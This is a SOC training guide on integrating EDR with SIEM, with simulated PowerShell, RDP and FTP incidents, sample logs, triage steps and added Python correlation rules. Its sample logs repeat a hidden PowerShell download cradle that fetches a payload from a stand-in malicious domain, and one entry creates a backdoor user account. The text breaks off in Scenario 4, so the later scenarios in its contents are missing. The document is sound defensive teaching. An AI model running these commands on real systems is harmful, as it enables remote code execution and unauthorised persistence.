Analysing EDR Logs With SIEM Integration


ANALYSING EDR LOGS WITH SIEM INTEGRATION, EXAMPLES AND SIMULATIONS

BY IZZMIER IZZUDDIN
Table of Contents

COMBINING EDR WITH SIEM
1. Understand the Roles of EDR and SIEM
2. Integrate EDR Data into SIEM
3. Build Cross-Platform Detection Rules
4. Develop an Integrated Incident Response Workflow
5. Centralise Threat Hunting and Investigation
6. Enhance Reporting and Compliance
7. Continuous Improvement through Feedback Loops
8. Enhance Skills and Training

EXAMPLES AND SIMULATIONS
Scenario 1: Suspicious PowerShell Execution On Multiple Endpoints
Scenario 2: Lateral Movement Detected Via Suspicious Use Of Remote Desktop Protocol (RDP)
Scenario 3: Data Exfiltration Detected Via Unusual FTP Activity
Scenario 4: Malware Infection Detected Via Abnormal PowerShell Activity
Scenario 5: Phishing Attack Detected Via Unusual Email Activity
Scenario 6: Ransomware Attack Detected Via Unusual File Encryption Activity
Scenario 7: Unauthorised Access Detected Via VPN Connection
Scenario 8: Malware Detected In Email Attachment With Lateral Movement

COMBINING EDR WITH SIEM
1. Understand The Roles Of EDR And SIEM
• EDR focuses on monitoring, detecting and responding to threats at the endpoint
level. It provides deep visibility into endpoint activities, such as process
execution, file access and network connections.

• SIEM aggregates, normalises and analyses log data from multiple sources,
including EDR, firewalls, IDS/IPS and applications, to provide a holistic view of an
organisation’s security environment. SIEM excels at correlating events across
different systems and identifying complex attack patterns.

2. Integrate EDR Data Into SIEM

• Enable Data Feeds
Configure your EDR solution to send logs and alerts to your SIEM platform.
Ensure that endpoint activity data, such as process execution, network
connections, file changes and user actions, is fed into the SIEM in real time.

• Normalise and Correlate Data
Use the SIEM's data normalisation capabilities to convert raw EDR logs into a
standardised format. Set up correlation rules to identify suspicious activities
that may span multiple endpoints or involve other network components.

• Enhance Alert Enrichment
Utilise EDR data to enrich SIEM alerts. For example, if a SIEM alert is generated
for a suspicious network connection, EDR data can provide additional context,
such as the processes or applications involved, the endpoint user and any
related activities.

3. Build Cross-Platform Detection Rules

• Create Correlated Alerts
Develop detection rules that use both EDR and SIEM data to identify threats. For
example, a rule could combine SIEM alerts for failed logins with EDR alerts for
unauthorised access attempts on an endpoint to detect a potential brute-force
attack.

• Leverage the MITRE ATT&CK Framework
Use the MITRE ATT&CK framework to create detection rules that cover tactics
and techniques relevant to both EDR and SIEM data sources.

4. Develop An Integrated Incident Response Workflow

• Unified Playbooks
Create incident response playbooks that incorporate both SIEM and EDR
actions. For instance, if a SIEM alert identifies a potential attack, the playbook
could include steps to use EDR to isolate affected endpoints, terminate
malicious processes and collect forensic data.

• Automate Response Actions
Utilise the SIEM’s automation and orchestration capabilities to trigger EDR
responses automatically. For example, configure the SIEM to initiate an EDR
investigation or endpoint isolation if certain conditions are met.

5. Centralise Threat Hunting And Investigation

• Use SIEM for Broad Threat Hunting
Perform initial threat hunting across the entire environment using the SIEM's
aggregated data. Use its search and analytics capabilities to identify anomalies
or suspicious patterns that may warrant further investigation.

• Drill Down with EDR
Once potential threats are identified, use the EDR tool for a more detailed
investigation at the endpoint level. EDR provides deep visibility into endpoint
activities, such as process creation, registry changes and network connections,
to analyse the threat further.

6. Enhance Reporting And Compliance

• Comprehensive Reporting
Use SIEM to generate consolidated reports that include both network-level and
endpoint-level data. This helps in presenting a complete picture of the
organisation’s security posture to stakeholders and meeting compliance
requirements.

• Maintain Audit Trails
Ensure both SIEM and EDR logs are stored and accessible for future audits and
investigations. Retain logs for as long as necessary based on your organisation’s
compliance requirements.

7. Continuous Improvement Through Feedback Loops

• Review Incident Post-Mortems
Regularly review incidents that involved both EDR and SIEM data. Identify gaps in
detection, response or integration and adjust rules, playbooks or configurations
accordingly.

• Adapt to New Threats
Continuously update your detection rules and response strategies based on new
threat intelligence, emerging attack techniques and evolving business needs.

8. Enhance Skills And Training

• Cross-Train Teams
Ensure that SOC analysts are skilled in both SIEM and EDR platforms. Encourage
cross-training sessions to improve knowledge sharing and expertise.

• Regular Drills and Simulations
Conduct joint incident response exercises and simulations to test the combined
capabilities of your EDR and SIEM setup.

EXAMPLES AND SIMULATIONS
Scenario 1: Suspicious PowerShell Execution On Multiple Endpoints
Overview: Your organisation uses both a SIEM platform (like Splunk or QRadar) and an
EDR solution (such as CrowdStrike Falcon or Microsoft Defender for Endpoint). The
SIEM receives an alert indicating potential malicious activity involving PowerShell
execution across multiple endpoints.

Alert Details:

• Alert Name: Suspicious PowerShell Script Execution

• Severity: High

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints executed a suspicious PowerShell command
that matches known attack patterns. This behaviour was correlated with an
increased number of failed login attempts.

• Time of Alert: 29-08-2024 10:30:00 UTC

Log Data:

EDR Log Entry 1:

Timestamp: 29-08-2024 10:25:45 UTC

Endpoint: WIN10-CLIENT01

User: izzmier

Process: PowerShell.exe

CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

Action: Blocked

Detection Method: Script Analysis

Threat ID: EDR-5678

Severity: High

EDR Log Entry 2:

Timestamp: 29-08-2024 10:26:10 UTC

Endpoint: WIN10-CLIENT02

User: iffah

Process: PowerShell.exe

CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

Action: Blocked

Detection Method: Behavioural Analysis

Threat ID: EDR-5679

Severity: High

EDR Log Entry 3:

Timestamp: 29-08-2024 10:26:30 UTC

Endpoint: WIN10-SERVER01

User: administrator

Process: PowerShell.exe

CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

Action: Blocked

Detection Method: Machine Learning

Threat ID: EDR-5680

Severity: High

SIEM Correlated Alert Log Entry:

Timestamp: 29-08-2024 10:30:00 UTC

Alert ID: SIEM-12345

Alert Name: Suspicious PowerShell Script Execution

Source: EDR Logs

Correlated Events: 3

Affected Hosts: WIN10-CLIENT01, WIN10-CLIENT02, WIN10-SERVER01

Correlated Threat ID: EDR-5678, EDR-5679, EDR-5680


Correlation Rule: Detect multiple PowerShell script executions with network connections to suspicious domains

Severity: High
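As an added example (Python written for this page, not code from the original document or from any EDR or SIEM vendor), the block below parses EDR entries in the "Key: Value" layout shown above and implements the correlation rule named in the SIEM alert, which is also the kind of cross-platform rule sections 2 and 3 describe: it normalises each entry, flags download-cradle indicators in the command line, and raises one correlated alert when at least two distinct endpoints reach a watchlisted domain inside a ten-minute window. The indicator names, the watchlist, the window and the function names are assumptions; the sample entries are constructed to mirror the three above.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

TS_FORMAT = "%d-%m-%Y %H:%M:%S UTC"  # timestamp layout used by the entries above

# Constructed sample: the three Scenario 1 entries in the same "Key: Value" layout.
EDR_LOG_TEXT = """\
EDR Log Entry 1:
Timestamp: 29-08-2024 10:25:45 UTC
Endpoint: WIN10-CLIENT01
User: izzmier
Process: PowerShell.exe
CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"
Action: Blocked
Threat ID: EDR-5678

EDR Log Entry 2:
Timestamp: 29-08-2024 10:26:10 UTC
Endpoint: WIN10-CLIENT02
User: iffah
Process: PowerShell.exe
CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"
Action: Blocked
Threat ID: EDR-5679

EDR Log Entry 3:
Timestamp: 29-08-2024 10:26:30 UTC
Endpoint: WIN10-SERVER01
User: administrator
Process: PowerShell.exe
CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"
Action: Blocked
Threat ID: EDR-5680
"""

# Download-cradle indicators (assumed names chosen for this example, not a vendor's).
INDICATORS = {
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

def parse_edr_entries(text):
    """Turn blank-line-separated 'Key: Value' blocks into one dict per EDR event."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        record = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")  # split on the first colon only
            if value.strip():                    # skips the "EDR Log Entry N:" heading
                record[key.strip()] = value.strip()
        if record:
            record["ts"] = datetime.strptime(record["Timestamp"], TS_FORMAT)
            records.append(record)
    return records

def classify_command(cmdline):
    """Return the cradle indicators present and the hostnames of embedded URLs."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    hosts = [urlparse(url).hostname for url in URL_RE.findall(cmdline)]
    return {"indicators": hits, "hosts": [h for h in hosts if h]}

def is_download_cradle(verdict):
    """A remote fetch combined with in-memory execution or a hidden window."""
    found = set(verdict["indicators"])
    return "remote_download" in found and bool(found & {"invoke_expression", "hidden_window"})

def correlate_powershell_cradles(records, watchlist, window=timedelta(minutes=10), min_hosts=2):
    """Raise one SIEM-style alert when at least min_hosts distinct endpoints ran a
    download cradle pointing at a watchlisted domain inside a single time window."""
    suspicious = []
    for rec in records:
        if rec.get("Process", "").lower() != "powershell.exe":
            continue
        verdict = classify_command(rec.get("CommandLine", ""))
        bad_domains = sorted(set(verdict["hosts"]) & set(watchlist))
        if is_download_cradle(verdict) and bad_domains:
            suspicious.append((rec, bad_domains))
    suspicious.sort(key=lambda item: item[0]["ts"])
    for i, (first, _) in enumerate(suspicious):       # sliding window from each hit
        group = [item for item in suspicious[i:] if item[0]["ts"] - first["ts"] <= window]
        hosts = sorted({rec["Endpoint"] for rec, _ in group})
        if len(hosts) >= min_hosts:
            return {
                "Alert Name": "Suspicious PowerShell Script Execution",
                "Correlated Events": len(group),
                "Affected Hosts": hosts,
                "Correlated Threat ID": [rec["Threat ID"] for rec, _ in group],
                "Suspicious Domains": sorted({d for _, bad in group for d in bad}),
                "Severity": "High",
            }
    return None

if __name__ == "__main__":
    print(correlate_powershell_cradles(parse_edr_entries(EDR_LOG_TEXT), {"malicious-domain.com"}))
```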

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The alert Suspicious PowerShell Script Execution is flagged as High severity,
indicating it requires immediate attention. The source is EDR logs
correlated by the SIEM, suggesting a coordinated attack across multiple
endpoints.

• Review Correlated Events:
The SIEM alert aggregates three individual EDR events across three endpoints
(WIN10-CLIENT01, WIN10-CLIENT02, WIN10-SERVER01). Each event involves
executing a PowerShell command that attempts to download a script from an
external domain (malicious-domain.com).

Step 2: Investigate EDR Logs

• Examine the Command Line Field:
The PowerShell commands are identical across all logs:
powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

This command:

o Runs PowerShell without loading a profile (-nop) and in a hidden window
(-w hidden), so no console window is visible to the user.

o Uses IEX (Invoke-Expression) to execute a script fetched directly from a
remote URL in memory, a common tactic in fileless malware attacks.

• Determine the Threat Source and Behaviour:
The URL http://malicious-domain.com/payload.ps1 points to a known malicious
domain hosting a payload script. Downloading and executing remote scripts
without writing them to disk is characteristic of "living off the land"
techniques often used by advanced threats.

Step 3: Check for Additional Indicators

• Correlate with Other SIEM Data:
Search SIEM logs for other suspicious activities around the same time frame,
such as:

o Failed Logins: Check if there were any failed login attempts or successful
logins from unusual locations.

o Network Traffic: Look for outbound connections to suspicious IPs or
domains (like malicious-domain.com).

Example log entry from SIEM:

Timestamp: 29-08-2024 10:24:30 UTC

Source IP: 192.168.1.10 (WIN10-CLIENT01)

Destination IP: 203.0.113.15 (malicious-domain.com)

Action: Allowed

Protocol: HTTP

Threat Source: EDR Correlation

Event ID: NET-7890

Step 4: Take Containment Actions

• Isolate Affected Endpoints:
Use the EDR platform to isolate the affected endpoints (WIN10-CLIENT01,
WIN10-CLIENT02, WIN10-SERVER01) from the network to prevent further spread
or exfiltration.

• Block Malicious Domains:
Coordinate with the network team to block outbound traffic to
malicious-domain.com at the firewall or proxy level.

• Terminate Malicious Processes:
Use the EDR tool to terminate the suspicious PowerShell process running on
each affected endpoint.

Step 5: Conduct a Root Cause Analysis

• Analyse Host Forensics:
Perform in-depth forensic analysis on the isolated endpoints:

o Check for persistence mechanisms, such as scheduled tasks or startup
registry keys.

o Review the history of executed commands and installed applications.

• Identify Patient Zero:
Determine which endpoint was compromised first. This might reveal how the
attacker initially gained access (e.g., phishing email, vulnerable software).

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report:
Document the findings, including:

o A timeline of events.

o Details of the PowerShell execution and correlation with other suspicious
activities.

o Actions taken to contain and remediate the threat.

o Recommendations for improving defences (e.g., enhanced endpoint
monitoring, user awareness training).

• Recommend Further Actions:

o Conduct a password reset for affected user accounts.

o Review and enhance PowerShell execution policies.

o Apply patches or updates to vulnerable software.


Scenario 2: Lateral Movement Detected Via Suspicious Use Of Remote Desktop Protocol (RDP)
Overview: The SIEM system receives an alert indicating suspicious lateral movement
within the network, detected by abnormal use of Remote Desktop Protocol (RDP)
across multiple endpoints. This is correlated with EDR logs showing unusual user
behaviour.

Alert Details:

• Alert Name: Suspicious Lateral Movement Detected via RDP

• Severity: Critical

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints have seen unauthorised use of RDP sessions
originating from a compromised account. The behaviour matches known lateral
movement tactics used by attackers to spread across a network.

• Time of Alert: 29-08-2024 12:45:00 UTC

Log Data:

EDR Log Entry 1:

Timestamp: 29-08-2024 12:40:05 UTC

Endpoint: WIN-SERVER-01

User: izzmier

Process: mstsc.exe

CommandLine: mstsc.exe /shadow:1 /noConsentPrompt

Action: Allowed

Detection Method: User Behaviour Analytics (UBA)

Threat ID: EDR-78901

Severity: High

EDR Log Entry 2:

Timestamp: 29-08-2024 12:42:15 UTC

Endpoint: WIN10-CLIENT03

User: izzmier
Process: mstsc.exe

CommandLine: mstsc.exe /v:WIN-SERVER-02

Action: Allowed

Detection Method: Anomaly Detection

Threat ID: EDR-78902

Severity: High

EDR Log Entry 3:

Timestamp: 29-08-2024 12:43:30 UTC

Endpoint: WIN-SERVER-02

User: admin

Process: cmd.exe

CommandLine: cmd.exe /c net user hacker P@ssw0rd /add

Action: Allowed

Detection Method: Behaviour Analysis

Threat ID: EDR-78903

Severity: Critical

SIEM Correlated Alert Log Entry:

Timestamp: 29-08-2024 12:45:00 UTC

Alert ID: SIEM-98765

Alert Name: Suspicious Lateral Movement Detected via RDP

Source: EDR Logs

Correlated Events: 3

Affected Hosts: WIN-SERVER-01, WIN10-CLIENT03, WIN-SERVER-02

Correlated Threat ID: EDR-78901, EDR-78902, EDR-78903

Correlation Rule: Detect suspicious RDP sessions with unusual user behaviour and
command execution

Severity: Critical

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The SIEM alert named Suspicious Lateral Movement Detected via RDP is flagged
as Critical, indicating a possible severe security incident. The source is EDR logs
showing unauthorised RDP use across several endpoints.

• Review Correlated Events:
The alert aggregates three EDR events, each involving unusual RDP sessions and
command execution across three endpoints (WIN-SERVER-01, WIN10-CLIENT03,
WIN-SERVER-02).

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: mstsc.exe is used on WIN-SERVER-01 by user izzmier with the
/shadow:1 /noConsentPrompt parameters, suggesting remote control of
another user's session without their consent.

o Log Entry 2: mstsc.exe is used on WIN10-CLIENT03 by the same user
(izzmier) to connect to WIN-SERVER-02.

o Log Entry 3: cmd.exe on WIN-SERVER-02 is executed by user admin to
add a new user hacker with a preset password, a clear indication of
malicious intent to maintain persistence.

Step 3: Correlate with Additional SIEM Data

• Correlate with Recent Login Events: Search for recent login events associated
with user izzmier:

Timestamp: 29-08-2024 12:35:00 UTC

Source IP: 203.0.113.50

Destination: WIN-SERVER-01

User: izzmier

Action: Login Success

Authentication Type: RDP

Event ID: AUTH-2345


The login success event shows that the izzmier account logged in from an external IP
(203.0.113.50). This is an abnormal activity, suggesting the account might be
compromised.

• Check Network Traffic Logs: Look for suspicious outbound and inbound
connections:

Timestamp: 29-08-2024 12:33:25 UTC

Source IP: 192.168.100.5 (WIN-SERVER-01)

Destination IP: 203.0.113.15

Protocol: RDP

Action: Allowed

Threat Source: EDR Correlation

Event ID: NET-9998

The log shows an RDP connection originating from WIN-SERVER-01 to an external IP,
which is unusual and could indicate an attacker’s lateral movement.
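As an added example (Python written for this page, not code from the original document), the block below turns the three sources used in Steps 2 and 3 into one sequence rule: an RDP login from outside the organisation's own address ranges, mstsc.exe pivots by the same account within a window, and then a net user /add on a host the chain reached, which escalates the alert to Critical. The internal address ranges, the 15-minute window and the already-normalised event dicts are constructed assumptions that mirror the AUTH and EDR entries above.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

TS_FORMAT = "%d-%m-%Y %H:%M:%S UTC"
# Assumed internal address space of the organisation; any other source is external.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
RDP_TARGET = re.compile(r"/v:(\S+)", re.I)                                 # mstsc.exe /v:<host>
NET_USER_ADD = re.compile(r"\bnet1?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)  # local account creation

# Constructed sample, already normalised by the SIEM, mirroring the Scenario 2 entries.
EVENTS = [
    {"ts": "29-08-2024 12:35:00 UTC", "source": "auth", "event_id": "AUTH-2345",
     "host": "WIN-SERVER-01", "user": "izzmier", "src_ip": "203.0.113.50",
     "action": "Login Success", "auth_type": "RDP"},
    {"ts": "29-08-2024 12:40:05 UTC", "source": "edr", "event_id": "EDR-78901",
     "host": "WIN-SERVER-01", "user": "izzmier", "process": "mstsc.exe",
     "cmdline": "mstsc.exe /shadow:1 /noConsentPrompt"},
    {"ts": "29-08-2024 12:42:15 UTC", "source": "edr", "event_id": "EDR-78902",
     "host": "WIN10-CLIENT03", "user": "izzmier", "process": "mstsc.exe",
     "cmdline": "mstsc.exe /v:WIN-SERVER-02"},
    {"ts": "29-08-2024 12:43:30 UTC", "source": "edr", "event_id": "EDR-78903",
     "host": "WIN-SERVER-02", "user": "admin", "process": "cmd.exe",
     "cmdline": "cmd.exe /c net user hacker P@ssw0rd /add"},
]


def is_external(ip):
    """True when the address lies outside every internal range."""
    return not any(ip_address(ip) in net for net in INTERNAL_NETS)


def is_rdp_pivot(event, account):
    """mstsc.exe run by the compromised account to shadow a session or open a new one."""
    cmd = event.get("cmdline", "").lower()
    return (event["user"] == account and event.get("process", "").lower() == "mstsc.exe"
            and ("/shadow:" in cmd or "/v:" in cmd))


def detect_rdp_lateral_movement(events, window=timedelta(minutes=15)):
    """Sequence rule: external RDP login -> mstsc pivot(s) by the same account ->
    account creation on a host the chain reached, all inside one window."""
    evs = sorted((dict(e, when=datetime.strptime(e["ts"], TS_FORMAT)) for e in events),
                 key=lambda e: e["when"])
    alerts = []
    for login in evs:
        if not (login["source"] == "auth" and login.get("auth_type") == "RDP"
                and login["action"] == "Login Success" and is_external(login["src_ip"])):
            continue
        chain, hosts, new_users = [login], {login["host"]}, []
        for e in evs:
            if e["source"] != "edr" or not login["when"] < e["when"] <= login["when"] + window:
                continue
            cmd = e.get("cmdline", "")
            if is_rdp_pivot(e, login["user"]):
                chain.append(e)
                hosts.add(e["host"])
                if (target := RDP_TARGET.search(cmd)):
                    hosts.add(target.group(1).upper())   # host the new session was opened to
            elif (added := NET_USER_ADD.search(cmd)) and e["host"] in hosts:
                chain.append(e)
                new_users.append(added.group(1))
        if len(chain) < 2:
            continue  # a lone external RDP login belongs to the authentication rule
        alerts.append({
            "Alert Name": "Suspicious Lateral Movement Detected via RDP",
            "Severity": "Critical" if new_users else "High",
            "Compromised Account": login["user"],
            "External IP": login["src_ip"],
            "Affected Hosts": sorted(hosts),
            "Correlated Events": [e["event_id"] for e in chain],
            "New Accounts": new_users,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_lateral_movement(EVENTS):
        print(alert)
```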

Step 4: Take Immediate Containment Actions

• Isolate Affected Hosts: Use the EDR platform to isolate WIN-SERVER-01,
WIN10-CLIENT03 and WIN-SERVER-02 from the network to prevent further
compromise.

• Block Suspicious IP Addresses: Block the external IPs (203.0.113.50 and
203.0.113.15) at the network perimeter firewall.

• Terminate Malicious Sessions: Use the EDR to terminate any active RDP
sessions originating from the compromised account (izzmier).

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: The izzmier account appears to be the initial
vector for the attack. Investigate how this account was compromised (e.g., via
phishing, brute-force, credential stuffing).

• Examine Host Forensics: Analyse logs from isolated hosts for signs of
persistence mechanisms (e.g., registry changes, new scheduled tasks) or
additional backdoors that might have been installed.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised RDP sessions across multiple hosts
detected, suggesting lateral movement by an attacker.

o Affected Accounts: izzmier and potentially admin (compromised for
privilege escalation).

o Affected Hosts: WIN-SERVER-01, WIN10-CLIENT03, WIN-SERVER-02.

o Indicators of Compromise (IoCs): External IPs (203.0.113.50,
203.0.113.15), newly created user hacker, unusual command executions.

o Containment Actions: Isolation of affected hosts, blocking suspicious
IPs, terminating malicious sessions.

• Recommendations:

o Reset credentials for compromised accounts.

o Enforce multi-factor authentication (MFA) for all remote connections.

o Conduct an organisation-wide audit for other potential compromises.

o Review and tighten access controls for RDP.


Scenario 3: Data Exfiltration Detected Via Unusual FTP Activity
Overview: The SIEM system generates an alert indicating potential data exfiltration,
detected by unusual FTP activity across several endpoints. This is correlated with EDR
logs showing anomalous file transfers, indicating that an attacker may be attempting to
exfiltrate sensitive data from the network.

Alert Details:

• Alert Name: Data Exfiltration Detected via Unusual FTP Activity

• Severity: Critical

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints have initiated large FTP transfers to an external
IP address. The behaviour is consistent with known data exfiltration techniques.

• Time of Alert: 29-08-2024 15:30:00 UTC

Log Data:

EDR Log Entry 1:

• Timestamp: 29-08-2024 15:25:05 UTC

• Endpoint: WIN-SERVER-03

• User: izzmier

• Process: ftp.exe

• CommandLine: ftp.exe -s:upload.txt

• Action: Allowed

• Detection Method: Anomaly Detection

• Threat ID: EDR-89001

• Severity: High

EDR Log Entry 2:

• Timestamp: 29-08-2024 15:27:15 UTC

• Endpoint: WIN10-CLIENT04

• User: izzmier

• Process: ftp.exe
• CommandLine: ftp.exe -s:upload.txt

• Action: Allowed

• Detection Method: User Behaviour Analytics (UBA)

• Threat ID: EDR-89002

• Severity: High

EDR Log Entry 3:

• Timestamp: 29-08-2024 15:28:30 UTC

• Endpoint: WIN-SERVER-04

• User: admin

• Process: ftp.exe

• CommandLine: ftp.exe -s:upload.txt

• Action: Allowed

• Detection Method: Behaviour Analysis

• Threat ID: EDR-89003

• Severity: Critical

SIEM Correlated Alert Log Entry:

• Timestamp: 29-08-2024 15:30:00 UTC

• Alert ID: SIEM-87654

• Alert Name: Data Exfiltration Detected via Unusual FTP Activity

• Source: EDR Logs

• Correlated Events: 3

• Affected Hosts: WIN-SERVER-03, WIN10-CLIENT04, WIN-SERVER-04

• Correlated Threat ID: EDR-89001, EDR-89002, EDR-89003

• Correlation Rule: Detect unusual FTP activity that matches known data
exfiltration patterns

• Severity: Critical

Analysis:

Step 1: Initial Triage

• Check the Alert Details:


The SIEM alert, "Data Exfiltration Detected via Unusual FTP Activity," is flagged as
Critical, indicating a severe security incident. The alert source is EDR logs
showing unauthorised FTP activity across several endpoints.

• Review Correlated Events:


The alert aggregates three EDR events, each involving FTP sessions across three
endpoints (WIN-SERVER-03, WIN10-CLIENT04, WIN-SERVER-04).

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: ftp.exe is used on WIN-SERVER-03 by user izzmier, executing
the script upload.txt (-s:upload.txt), suggesting a scripted bulk file transfer.

o Log Entry 2: The same command ftp.exe -s:upload.txt is used on
WIN10-CLIENT04 by the same user (izzmier), indicating repeated behaviour
across different machines.

o Log Entry 3: ftp.exe -s:upload.txt is executed on WIN-SERVER-04 by user
admin, raising concerns as this account is often used for administrative
tasks, not data transfer.

Step 3: Correlate with Additional SIEM Data

• Correlate with Recent Network Traffic Events:

o Timestamp: 29-08-2024 15:24:00 UTC

o Source IP: 192.168.100.10 (WIN-SERVER-03)

o Destination IP: 203.0.113.20

o Protocol: FTP

o Action: Allowed

o Event ID: NET-4567

The log shows a large volume of FTP traffic from WIN-SERVER-03 to an
external IP (203.0.113.20), which is unusual and indicates potential data
exfiltration.

• Check DNS Logs:

o Timestamp: 29-08-2024 15:22:10 UTC


o Source IP: 192.168.100.10 (WIN-SERVER-03)

o Queried Domain: malicious-domain.com

o Event ID: DNS-6789


The DNS log reveals that WIN-SERVER-03 queried a suspicious domain
just before the FTP activity, further supporting the data exfiltration
hypothesis.

Step 4: Take Immediate Containment Actions

• Isolate Affected Hosts: Use the EDR platform to isolate WIN-SERVER-03,
WIN10-CLIENT04 and WIN-SERVER-04 from the network to prevent further data
leakage.

• Block Suspicious IP Addresses: Block the external IP (203.0.113.20) at the
network perimeter firewall.

• Terminate Malicious Processes: Use the EDR to terminate any active ftp.exe
processes originating from the compromised accounts.

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: The account izzmier appears to be the initial
vector for the attack. Investigate how this account was compromised (e.g.,
phishing, credential theft).

• Examine Host Forensics: Analyse logs from isolated hosts for signs of
persistence mechanisms or additional data that might have been transferred.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised FTP sessions across multiple hosts
detected, suggesting data exfiltration by an attacker.

o Affected Accounts: izzmier and potentially admin (compromised for
privilege escalation).

o Affected Hosts: WIN-SERVER-03, WIN10-CLIENT04, WIN-SERVER-04.

o Indicators of Compromise (IoCs): External IP (203.0.113.20), queried
domain (malicious-domain.com), unusual FTP command executions.

o Containment Actions: Isolation of affected hosts, blocking suspicious
IPs, terminating malicious FTP sessions.

• Recommendations:

o Reset credentials for compromised accounts.

o Implement DLP (Data Loss Prevention) solutions to monitor and block
unauthorised file transfers.

o Enforce multi-factor authentication (MFA) for all administrative accounts.

o Conduct a thorough audit of network traffic and DNS logs for other
potential data exfiltration attempts.

Scenario 4: Malware Infection Detected Via Abnormal PowerShell Activity
Overview: The SIEM system generates an alert indicating a possible malware infection,
detected by abnormal PowerShell activity across multiple endpoints. This is correlated
with EDR logs showing the execution of suspicious PowerShell commands, indicative of
a malware attack.

Alert Details:

• Alert Name: Malware Infection Detected via Abnormal PowerShell Activity

• Severity: High

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints have executed suspicious PowerShell
commands that are often associated with malware infections. The behaviour
matches known tactics used by attackers to establish persistence and download
additional payloads.

• Time of Alert: 29-08-2024 18:15:00 UTC

Log Data:

EDR Log Entry 1:

• Timestamp: 29-08-2024 18:10:05 UTC

• Endpoint: WIN-SERVER-05

• User: izzmier

• Process: powershell.exe

• CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

• Action: Allowed

• Detection Method: Behaviour Analysis

• Threat ID: EDR-90101

• Severity: High

EDR Log Entry 2:

• Timestamp: 29-08-2024 18:12:15 UTC

• Endpoint: WIN10-CLIENT05

• User: izzmier
• Process: powershell.exe

• CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

• Action: Allowed

• Detection Method: Anomaly Detection

• Threat ID: EDR-90102

• Severity: High

EDR Log Entry 3:

• Timestamp: 29-08-2024 18:13:30 UTC

• Endpoint: WIN-SERVER-06

• User: admin

• Process: powershell.exe

• CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"

• Action: Allowed

• Detection Method: User Behaviour Analytics (UBA)

• Threat ID: EDR-90103

• Severity: Critical

SIEM Correlated Alert Log Entry:

• Timestamp: 29-08-2024 18:15:00 UTC

• Alert ID: SIEM-54321

• Alert Name: Malware Infection Detected via Abnormal PowerShell Activity

• Source: EDR Logs

• Correlated Events: 3

• Affected Hosts: WIN-SERVER-05, WIN10-CLIENT05, WIN-SERVER-06

• Correlated Threat ID: EDR-90101, EDR-90102, EDR-90103

• Correlation Rule: Detect abnormal PowerShell activity associated with known
malware behaviour

• Severity: High

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The SIEM alert "Malware Infection Detected via Abnormal PowerShell Activity" is
flagged as High, indicating a significant security incident. The source is EDR logs
showing unauthorised PowerShell executions across several endpoints.

• Review Correlated Events:
The alert aggregates three EDR events, each involving the execution of
suspicious PowerShell commands on three endpoints (WIN-SERVER-05,
WIN10-CLIENT05, WIN-SERVER-06).

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"
was executed on WIN-SERVER-05 by user izzmier. This command downloads
and executes a script from a malicious domain, a common method used by
attackers to deliver malware.

o Log Entry 2: The same PowerShell command was executed on WIN10-CLIENT05
by the same user, indicating repeated malicious behaviour across multiple
machines.

o Log Entry 3: The PowerShell command was executed on WIN-SERVER-06
by user admin, suggesting the attacker has gained elevated privileges and
is spreading malware across critical systems.

Step 3: Correlate with Additional SIEM Data

• Correlate with Recent Web Traffic Logs:

o Timestamp: 29-08-2024 18:09:45 UTC

o Source IP: 192.168.101.15 (WIN-SERVER-05)

o Destination URL: http://malicious-domain.com/payload.ps1

o Action: Allowed

o Event ID: WEB-1234

The web traffic log confirms that WIN-SERVER-05 successfully connected
to a known malicious domain to download the payload.

• Check DNS Logs:


